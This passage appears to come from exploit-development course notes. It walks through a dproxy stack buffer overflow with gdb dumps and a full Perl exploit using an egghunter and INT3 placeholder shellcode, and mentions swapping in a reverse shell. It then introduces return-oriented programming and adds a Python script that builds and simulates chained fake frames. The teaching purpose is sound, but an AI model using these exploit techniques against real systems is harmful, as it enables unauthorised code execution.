  1474. edx 0xbf9c7da8 0xbf9c7da8
  1475. ebx 0x43377143 0x43377143
  1476. esp 0xbf9c7c00 0xbf9c7c00
  1477. ebp 0x30724339 0x30724339
  1478. esi 0x71433871 0x71433871
  1479. edi 0xbf9c8c40 0xbf9c8c40
  1480. eip 0x432e7243 0x432e7243 <------ messed up EIP
  1481.  
  1482. ---------------------------Type This-----------------------------------
  1483.  
  1484. (gdb) x/64x $esp
  1485. -----------------------------------------------------------------------
  1486.  
  1487. 0xbf9c7c00: 0x72433272 0x34724333 0x43357243 0x72433672
  1488. 0xbf9c7c10: 0x38724337 0x43397243 0x73433073 0x32734331
  1489. 0xbf9c7c20: 0x43337343 0x73433473 0x36734335 0x43377343
  1490. 0xbf9c7c30: 0x7343382e 0x30744339 0x43317443 0x74433274
  1491. 0xbf9c7c40: 0x34744333 0x43357443 0x74433674 0x38744337
  1492. 0xbf9c7c50: 0x43397443 0x75433075 0x32754331 0x43337543
  1493. 0xbf9c7c60: 0x75433475 0x36754335 0x43377543 0x75433875
  1494. 0xbf9c7c70: 0x30764339 0x43317643 0x76433276 0x34764333
  1495. 0xbf9c7c80: 0x43357643 0x76433676 0x38764337 0x43397643
  1496. 0xbf9c7c90: 0x77433077 0x32774331 0x43337743 0x77433477
  1497. 0xbf9c7ca0: 0x36774335 0x4337772e 0x77433877 0x30784339
  1498. 0xbf9c7cb0: 0x43317843 0x78433278 0x34784333 0x43357843
  1499. 0xbf9c7cc0: 0x78433678 0x38784337 0x43397843 0x79433079
  1500. 0xbf9c7cd0: 0x32794331 0x43337943 0x79433479 0x36794335
  1501. 0xbf9c7ce0: 0x43377943 0x79433879 0x307a432e 0x43317a43
  1502. 0xbf9c7cf0: 0x7a43327a 0x347a4333 0x43357a43 0x7a43367a
  1503.  
  1504. Relative position of ESP
  1505. [ESP] = 0x72433272 - 2077 bytes
  1506.  
  1507. We assume EIP is overwritten at 2073 bytes
  1508.  
  1509. dproxy3.py
  1510. - confirm that we get EIP = 42424242
  1511. - check the stack memory x/64x $esp
  1512.  
  1513. ---------------------------Type This-----------------------------------
  1514.  
  1515. (gdb) info registers
  1516. -----------------------------------------------------------------------
  1517.  
  1518. eax 0xbf9c8c40 0xbf9c8c40
  1519. ecx 0x184f 0x184f
  1520. edx 0xbf9c7df5 0xbf9c7df5
  1521. ebx 0x41414141 0x41414141
  1522. esp 0xbf9c7c00 0xbf9c7c00
  1523. ebp 0x41414141 0x41414141
  1524. esi 0x41414141 0x41414141
  1525. edi 0xbf9c8c40 0xbf9c8c40
  1526. eip 0x42424242 0x42424242
  1527.  
  1528. ---------------------------Type This-----------------------------------
  1529.  
  1530. (gdb) x/64x $esp
  1531. -----------------------------------------------------------------------
  1532.  
  1533. 0xbf9c7c00: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1534. 0xbf9c7c10: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1535. 0xbf9c7c20: 0xcccccccc 0xcccccccc 0xcccccccc 0x2ecccccc
  1536. 0xbf9c7c30: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1537. 0xbf9c7c40: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1538. 0xbf9c7c50: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1539. 0xbf9c7c60: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1540. 0xbf9c7c70: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1541. 0xbf9c7c80: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1542.  
  1543. NEXT STEP - GET INT3
  1544.  
  1545. ---------------------------Type This-----------------------------------
  1546.  
  1547. msfelfscan -j esp dproxy_binary
  1548. -----------------------------------------------------------------------
  1549.  
  1550. 0x0804a7ca push esp
  1551.  
  1552. Core was generated by `/usr/local/sbin/dproxy'.
  1553. Program terminated with signal 5, Trace/breakpoint trap.
  1554. #0 0xbf9c7c01 in ?? ()
  1555.  
  1556. ---------------------------Type This-----------------------------------
  1557.  
  1558. (gdb) info registers
  1559. -----------------------------------------------------------------------
  1560.  
  1561. eax 0xbf9c8c40 0xbf9c8c40
  1562. ecx 0x184f 0x184f
  1563. edx 0xbf9c7df5 0xbf9c7df5
  1564. ebx 0x41414141 0x41414141
  1565. esp 0xbf9c7c00 0xbf9c7c00
  1566. ebp 0x41414141 0x41414141
  1567. esi 0x41414141 0x41414141
  1568. edi 0xbf9c8c40 0xbf9c8c40
  1569. eip 0xbf9c7c01 0xbf9c7c01
  1570.  
  1571. ---------------------------Type This-----------------------------------
  1572.  
  1573. (gdb) x/64x $eip
  1574. -----------------------------------------------------------------------
  1575.  
  1576. 0xbf9c7c01: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1577. 0xbf9c7c11: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1578. 0xbf9c7c21: 0xcccccccc 0xcccccccc 0xcccccccc 0x2e2ecccc
  1579. 0xbf9c7c31: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1580. 0xbf9c7c41: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1581. 0xbf9c7c51: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1582. 0xbf9c7c61: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1583. 0xbf9c7c71: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1584. 0xbf9c7c81: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
  1585.  
  1586.  
  1587. USING THE EGGHUNTER - DPROXY5
  1588.  
  1589.  
  1590. [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP | <---truncated
  1591.                                 ^           ^
  1592.                                2073       ESP (2077)
  1593.  
  1594.  
  1595. [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP ... NOP NOP 50905090 50905090 SHELLCODE ]
  1596.  
  1597. --------------------------------------old perl version of the code------------------------------------------------------
  1598. # taken from Skape's paper
  1599. $linux_egghunter =
  1600. "\xBB\x90\x50\x90\x50". # mov ebx, 0x50905090 <-- this is the EGG
  1601. "\x31\xC9". # xor ecx,ecx
  1602. "\xF7\xE1". # mul ecx
  1603. "\x66\x81\xCA\xFF\x0F". # or dx,0xfff
  1604. "\x42". # inc edx
  1605. "\x60". # pusha
  1606. "\x8D\x5A\x04". # lea ebx,[edx+0x4]
  1607. "\xB0\x21". # mov al,0x21
  1608. "\xCD\x80". # int 0x80
  1609. "\x3C\xF2". # cmp al,0xf2
  1610. "\x61". # popa
  1611. "\x74\xED". # jz 0x9
  1612. "\x39\x1A". # cmp [edx],ebx
  1613. "\x75\xEE". # jnz 0xe
  1614. "\x39\x5A\x04". # cmp [edx+0x4],ebx
  1615. "\x75\xE9". # jnz 0xe
  1616. "\xFF\xE2"; # jmp edx
  1617.  
  1618. # when you need to use it, use the following EGG:
  1619. $egg = "\x50\x90\x50\x90\x50\x90\x50\x90";
  1620.  
  1621. $shellcode = "\xCC" x 500;
  1622.  
  1623. $nops = "\x90" x 100; # 100 NOPS to place between egghunter and shellcode
  1624.  
  1625. $buf .= "A" x $distance_to_eip;
  1626. $buf .= pack("V", $eip);
  1627. $buf .= $linux_egghunter;
  1628. $buf .= $nops;
  1629. $buf .= $egg;
  1630. $buf .= $shellcode;
  1631. --------------------------------------old perl version of the code------------------------------------------------------
  1632.  
  1633.  
  1634. Failed to read a valid object file image from memory.
  1635. Core was generated by `/usr/local/sbin/dproxy'.
  1636. Program terminated with signal 5, Trace/breakpoint trap.
  1637. #0 0xbf9c84d1 in ?? ()
  1638.  
  1639. ---------------------------Type This-----------------------------------
  1640.  
  1641. (gdb) x/64x $eip
  1642. -----------------------------------------------------------------------
  1643.  
  1644. 0xbf9c84d1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1645. 0xbf9c84e1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1646. 0xbf9c84f1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1647. 0xbf9c8501: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1648. 0xbf9c8511: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1649. 0xbf9c8521: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1650. 0xbf9c8531: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1651. 0xbf9c8541: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1652. 0xbf9c8551: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1653. 0xbf9c8561: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1654. 0xbf9c8571: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1655. 0xbf9c8581: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1656. 0xbf9c8591: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1657. 0xbf9c85a1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1658. 0xbf9c85b1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1659. 0xbf9c85c1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
  1660.  
  1661. REPLACE THE INT3 SHELLCODE WITH ALPHA2 ENCODED LINUX IA32 REVERSE SHELL
  1662.  
  1663. EXPLOIT WHICH REACHES INT3
  1664. --------------------------------------old perl version of the code------------------------------------------------------
  1665. #!/usr/bin/perl
  1666.  
  1667. binmode(STDOUT);
  1668.  
  1669. $| = 1; # turn off output buffering
  1670.  
  1671. $distance_to_eip = 2073; # replace this with distance to EIP
  1672. $eip = 0x0804a7ca; # push esp; ret - dproxy binary
  1673.  
  1674. # taken from Skape's paper
  1675. $linux_egghunter =
  1676. "\xBB\x90\x50\x90\x50". # mov ebx, 0x50905090 <-- this is the EGG
  1677. "\x31\xC9". # xor ecx,ecx
  1678. "\xF7\xE1". # mul ecx
  1679. "\x66\x81\xCA\xFF\x0F". # or dx,0xfff
  1680. "\x42". # inc edx
  1681. "\x60". # pusha
  1682. "\x8D\x5A\x04". # lea ebx,[edx+0x4]
  1683. "\xB0\x21". # mov al,0x21
  1684. "\xCD\x80". # int 0x80
  1685. "\x3C\xF2". # cmp al,0xf2
  1686. "\x61". # popa
  1687. "\x74\xED". # jz 0x9
  1688. "\x39\x1A". # cmp [edx],ebx
  1689. "\x75\xEE". # jnz 0xe
  1690. "\x39\x5A\x04". # cmp [edx+0x4],ebx
  1691. "\x75\xE9". # jnz 0xe
  1692. "\xFF\xE2"; # jmp edx
  1693.  
  1694. # when you need to use it, use the following EGG:
  1695. $egg = "\x50\x90\x50\x90\x50\x90\x50\x90";
  1696.  
  1697. $shellcode = "\xCC" x 500;
  1698.  
  1699. $nops = "\x90" x 100; # 100 NOPS to place between egghunter and shellcode
  1700.  
  1701. $buf .= "A" x $distance_to_eip;
  1702. $buf .= pack("V", $eip);
  1703. $buf .= $linux_egghunter;
  1704. $buf .= $nops;
  1705. $buf .= $egg;
  1706. $buf .= $shellcode;
  1707.  
  1708. print $buf;
  1709. --------------------------------------old perl version of the code------------------------------------------------------



###############################################
# Introduction to Return Oriented Programming #
###############################################

---------------------------Type This-----------------------------------

victim2.c
---------
make victim2
./victim2 AAAAAAAAAAAAA

gdb victim2
disassemble main
-----------------------------------------------------------------------

0x080483c7 <+31>: push 0x4
0x080483c9 <+33>: push 0x3
0x080483cb <+35>: call 0x8048426 <add>

main() pushes the two arguments right to left (4, then 3) and calls add(3, 4).
We want to set a breakpoint in main() just before add is called, so that we can
inspect the calling frame for add():

---------------------------Type This-----------------------------------

(gdb) break *0x080483cb
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----------------------------------------------------------------------

We are now stopped in main()
- just before call add()
- we want to look at the stack

In GDB, you can print the stack trace (the chain of saved return addresses) with any of the following commands:
where
backtrace
bt

---------------------------Type This-----------------------------------

(gdb) x/i $eip
-----------------------------------------------------------------------
=> 0x80483cb <main+35>: call 0x8048426 <add>

---------------------------Type This-----------------------------------

(gdb) x/64x $esp
-----------------------------------------------------------------------

0xbffffa60: 0x00000003 0x00000004 0xbffffa88 0x0804846b
            ^^^^^^^^^^ ^^^^^^^^^^
            param 1    param 2    (the two values main() just pushed)

---------------------------Type This-----------------------------------

(gdb) stepi <------ single step: executes the call, which pushes the return address
(gdb) where
-----------------------------------------------------------------------

#0 0x08048426 in add ()
#1 0x080483d0 in main ()

The return address 0x080483d0 is the instruction right after the 5-byte call at 0x080483cb.

---------------------------Type This-----------------------------------

(gdb) x/64x $esp
-----------------------------------------------------------------------

0xbffffa5c: 0x080483d0 0x00000003 0x00000004 0xbffffa88
            ^^^^^^^^^^ ^^^^^^^^^^ ^^^^^^^^^^
            saved      param 1    param 2
            return
            address
            (from add)

THIS IS THE CALLING FRAME FOR add(3, 4): the return address first, then the arguments above it.
Anything that can write this layout onto the stack (an overflow that reaches a saved return
address, for example) can make the program "call" add(3, 4) without ever executing a call instruction.
---------------------------Type This-----------------------------------

export EGG=`./frame1.py`
gdb victim2
(gdb) run $EGG
-----------------------------------------------------------------------

To chain a second fake frame, something has to discard the first frame's arguments
and return into the next one. __libc_csu_init contains a suitable gadget:

0x80484a5 <__libc_csu_init+85>: pop ebx
0x80484a6 <__libc_csu_init+86>: pop esi
0x80484a7 <__libc_csu_init+87>: pop edi <------ POP/POP/RET gadget starts here (0x80484a7)
0x80484a8 <__libc_csu_init+88>: pop ebp
0x80484a9 <__libc_csu_init+89>: ret

---------------------------Type This-----------------------------------

export EGG=`./frame2.py`
gdb victim2
(gdb) run $EGG
-----------------------------------------------------------------------

---------------------------Type This-----------------------------------

(gdb) x/100i 0x080483a8
-----------------------------------------------------------------------
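The following is an added example, not the course's frame1.py or frame2.py (those are not shown on this page). It builds the fake calling frame that the gdb session above showed for add(3, 4), chains two of them with the pop/pop/ret gadget from __libc_csu_init, and then walks the chain the way the CPU's ret instruction would, so that the reason for the gadget is visible without a debugger. The addresses of add and of the gadget are the ones from the gdb output above; the padding length DISTANCE is a hypothetical value, and the walker only knows the one function and one gadget that appear on the page.

```python
"""Added example (not the course's frame1.py/frame2.py): build and walk
fake calling frames for the victim2 session above. Addresses come from the
gdb output on the page; DISTANCE is hypothetical."""
import struct

ADD = 0x08048426            # add(int, int), from "call 0x8048426 <add>"
POP_POP_RET = 0x080484A7    # pop edi ; pop ebp ; ret, from __libc_csu_init
FUNCS = {ADD: ("add", 2)}   # address -> (name, number of stack arguments)
GADGETS = {POP_POP_RET: 2}  # address -> dwords popped before the ret
DISTANCE = 32               # hypothetical: bytes from the buffer to the saved return address


def p32(value):
    """Pack a dword little-endian, like pack("V", ...) in the Perl above."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def frame(func, args, ret=POP_POP_RET):
    """One fake calling frame: [func][return address][arg1][arg2].

    [return address][arg1][arg2] is exactly what gdb showed at 0xbffffa5c for
    add(3, 4); the function address goes in front so that a ret lands in add.
    """
    return p32(func) + p32(ret) + b"".join(p32(a) for a in args)


def build_chain(distance_to_ret, calls):
    """Padding up to the saved return address, then one frame per call."""
    buf = b"A" * distance_to_ret
    for func, args in calls:
        if len(args) != GADGETS[POP_POP_RET]:
            raise ValueError("pop/pop/ret only cleans up two arguments")
        buf += frame(func, args)
    return buf


def walk_chain(buf, distance_to_ret):
    """Simulate what happens after the overflowed function executes ret.

    Returns (calls made, faulting address or None). Every dword popped into
    eip must be a known function or gadget; anything else is where the real
    program would crash.
    """
    words = [struct.unpack("<I", buf[i:i + 4])[0]
             for i in range(distance_to_ret, len(buf) - 3, 4)]
    esp, calls = 0, []
    while esp < len(words):
        eip = words[esp]
        esp += 1                            # ret: pop eip
        if eip in FUNCS:
            name, nargs = FUNCS[eip]
            # on entry [esp] is the return address and the arguments sit above it
            calls.append((name, tuple(words[esp + 1:esp + 1 + nargs])))
            continue                        # the function's own ret pops words[esp]
        if eip in GADGETS:
            esp += GADGETS[eip]             # pop edi ; pop ebp: discard the arguments
            continue                        # ret pops the next frame's function
        return calls, eip                   # not code: this is where the crash happens
    return calls, None


def demo():
    """add(3, 4) then add(5, 6), with the gadget and with a junk return address."""
    good = build_chain(DISTANCE, [(ADD, [3, 4]), (ADD, [5, 6])])
    # the naive first attempt: the frame from gdb with no sane return address
    bad = b"A" * DISTANCE + p32(ADD) + p32(0x41414141) + p32(3) + p32(4)
    return walk_chain(good, DISTANCE), walk_chain(bad, DISTANCE)


if __name__ == "__main__":
    (good_calls, good_fault), (bad_calls, bad_fault) = demo()
    print("with gadget:", good_calls, "fault:", good_fault)
    print("junk return:", bad_calls, "fault:", hex(bad_fault))
```

The naive frame does reach add(3, 4), but add's own ret then pops the junk dword into eip. With the gadget as the return address, its two pops consume the arguments 3 and 4 and its ret pops the next frame's function address, which is what lets frame2 continue where frame1 stopped.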